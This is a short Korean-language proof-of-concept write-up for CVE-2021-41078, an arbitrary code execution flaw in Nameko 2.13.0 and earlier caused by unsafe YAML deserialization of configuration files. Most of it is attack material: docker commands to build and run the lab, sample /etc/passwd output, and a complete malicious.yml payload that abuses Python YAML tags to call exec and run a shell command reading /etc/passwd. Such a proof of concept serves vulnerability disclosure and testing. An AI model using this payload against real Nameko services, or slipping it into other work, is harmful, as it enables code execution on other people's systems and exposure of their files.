
nameko YAML 역직렬화로 인한 임의 코드 실행
nameko의 YAML 역직렬화로 인한 임의 코드 실행
Nameko 2.13.0 이하 버전은 설정 파일을 역직렬화할 때 임의 코드 실행을 수행하도록 속일 수 있습니다.

docker build -t cve-2021-41078 .
docker run -it --rm cve-2021-41078
/etc/passwd 출력
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"